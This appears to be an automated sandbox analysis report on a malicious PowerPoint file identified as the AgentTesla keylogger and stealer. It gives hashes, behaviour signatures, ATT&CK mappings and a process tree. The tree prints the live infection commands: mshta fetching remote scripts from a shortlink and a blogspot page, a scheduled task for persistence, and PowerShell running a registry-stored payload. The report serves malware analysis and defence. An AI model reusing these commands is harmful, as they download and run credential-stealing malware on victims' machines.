Overview

overview

10

Static

static

8

DOC.ppt

windows7_x64

10

DOC.ppt

windows10_x64

10

Resubmissions

25-02-2021 00:21

210225-efba8ycx12 10

Analysis

  • max time kernel
    86s
  • max time network
    147s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    25-02-2021 00:21

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    DOC.ppt

  • Size

    141KB

  • MD5

    53f09cdb89620ee0d02c006d5bdf758f

  • SHA1

    caf1ff6f5563d23eac7c547f2309c0608ae3029f

  • SHA256

    a9194b2dc593c73598cc95b3b1aad400910f48225e527dc61159300be44651ca

  • SHA512

    60374ee268f24ce193c860caf5ccf779a94388f44923bf2ecd5ba3273dfe937c4d8f960cdd906f56eccd39a81623636a2b07c22f116de8f1ee48cbe5f89b8a94

Score
10/10
agentteslakeyloggerpersistencespywarestealertrojan

Malware Config

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • AgentTesla Payload 2 IoCs
  • Blocklisted process makes network request 9 IoCs
  • Adds Run key to start application 2 TTPs 6 IoCs
    persistence
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Kills process with taskkill 2 IoCs
    evasion
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 26 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 29 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\DOC.ppt" /ou ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4716
    • C:\Windows\SYSTEM32\mSHtA.exe
      mSHtA http://12384928198391823%12384928198391823@j.mp/akawdowdkwoapdlwnduhand
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:2144
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""tutipajikhana"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@mylundisfarbigthenyouthink.blogspot.com/p/266.html""\"", 0 : window.close"\")
        3⤵
        • Creates scheduled task(s)
        PID:2748
      • C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe
        "C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe" -noexit ((gp HKCU:\Software).cutona)|IEX
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2808
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
          4⤵
            PID:4848
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:4752
        • C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe
          "C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe" -noexit ((gp HKCU:\Software).btfee)|IEX
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2928
        • C:\Windows\System32\taskkill.exe
          "C:\Windows\System32\taskkill.exe" /f /im Excel.exe
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2728
        • C:\Windows\System32\taskkill.exe
          "C:\Windows\System32\taskkill.exe" /f /im winword.exe
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3100
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 2144 -s 3116
          3⤵
          • Program crash
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4708
      • C:\Windows\SYSTEM32\ping.exe
        ping
        2⤵
        • Process spawned unexpected child process
        • Runs ping.exe
        PID:3984
      • C:\Program Files\Microsoft Office\Root\Office16\winword.exe
        winword
        2⤵
        • Checks processor information in registry
        • Enumerates system info in registry
        • Suspicious behavior: AddClipboardFormatListener
        • Suspicious use of SetWindowsHookEx
        PID:3252

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Scheduled Task

    1
    T1053

    Persistence

    Registry Run Keys / Startup Folder

    1
    T1060

    Scheduled Task

    1
    T1053

    Privilege Escalation

    Scheduled Task

    1
    T1053

    Defense Evasion

    Modify Registry

    1
    T1112

    Credential Access

    Discovery

    System Information Discovery

    3
    T1082

    Query Registry

    2
    T1012

    Remote System Discovery

    1
    T1018

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
      MD5

      c2d06c11dd1f1a8b1dedc1a311ca8cdc

      SHA1

      75c07243f9cb80a9c7aed2865f9c5192cc920e7e

      SHA256

      91ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586

      SHA512

      db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d

      Download Submit
    • memory/2144-7-0x0000000000000000-mapping.dmp
      Download
    • memory/2728-16-0x0000000000000000-mapping.dmp
      Download
    • memory/2748-15-0x0000000000000000-mapping.dmp
      Download
    • memory/2808-51-0x0000000009AF0000-0x0000000009AF1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2808-20-0x0000000074020000-0x000000007470E000-memory.dmp
      Filesize

      6.9MB

      Download
    • memory/2808-59-0x0000000007C40000-0x0000000007C53000-memory.dmp
      Filesize

      76KB

      Download
    • memory/2808-58-0x00000000043B3000-0x00000000043B4000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2808-53-0x000000000A130000-0x000000000A131000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2808-45-0x0000000008D80000-0x0000000008D81000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2808-18-0x0000000000000000-mapping.dmp
      Download
    • memory/2808-44-0x00000000080A0000-0x00000000080A1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2808-30-0x00000000043B2000-0x00000000043B3000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2808-28-0x00000000043B0000-0x00000000043B1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2928-55-0x000000000A9D0000-0x000000000A9D1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2928-35-0x0000000007360000-0x0000000007361000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2928-33-0x00000000072F0000-0x00000000072F1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2928-23-0x0000000004500000-0x0000000004501000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2928-25-0x0000000006CC0000-0x0000000006CC1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2928-27-0x0000000004630000-0x0000000004631000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2928-29-0x0000000004632000-0x0000000004633000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2928-37-0x00000000075B0000-0x00000000075B1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2928-17-0x0000000000000000-mapping.dmp
      Download
    • memory/2928-31-0x0000000006AF0000-0x0000000006AF1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2928-57-0x0000000009CD0000-0x0000000009CD1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2928-49-0x0000000009600000-0x0000000009601000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2928-47-0x00000000098B0000-0x00000000098B1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2928-40-0x0000000007960000-0x0000000007961000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2928-41-0x0000000007DF0000-0x0000000007DF1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2928-21-0x0000000074020000-0x000000007470E000-memory.dmp
      Filesize

      6.9MB

      Download
    • memory/3100-19-0x0000000000000000-mapping.dmp
      Download
    • memory/3252-9-0x0000000000000000-mapping.dmp
      Download
    • memory/3252-13-0x00007FF9871A0000-0x00007FF9877D7000-memory.dmp
      Filesize

      6.2MB

      Download
    • memory/3984-8-0x0000000000000000-mapping.dmp
      Download
    • memory/4708-22-0x000002566FD20000-0x000002566FD21000-memory.dmp
      Filesize

      4KB

      Download
    • memory/4716-4-0x00007FF965210000-0x00007FF965220000-memory.dmp
      Filesize

      64KB

      Download
    • memory/4716-6-0x00007FF965210000-0x00007FF965220000-memory.dmp
      Filesize

      64KB

      Download
    • memory/4716-2-0x00007FF965210000-0x00007FF965220000-memory.dmp
      Filesize

      64KB

      Download
    • memory/4716-5-0x00007FF9871A0000-0x00007FF9877D7000-memory.dmp
      Filesize

      6.2MB

      Download
    • memory/4716-3-0x00007FF965210000-0x00007FF965220000-memory.dmp
      Filesize

      64KB

      Download
    • memory/4752-60-0x0000000000400000-0x000000000043E000-memory.dmp
      Filesize

      248KB

      Download
    • memory/4752-61-0x00000000004382DE-mapping.dmp
      Download
    • memory/4752-62-0x0000000074020000-0x000000007470E000-memory.dmp
      Filesize

      6.9MB

      Download
    • memory/4752-66-0x0000000005330000-0x0000000005331000-memory.dmp
      Filesize

      4KB

      Download
    • memory/4752-68-0x0000000005240000-0x0000000005241000-memory.dmp
      Filesize

      4KB

      Download
    • memory/4752-69-0x00000000057F0000-0x00000000057F1000-memory.dmp
      Filesize

      4KB

      Download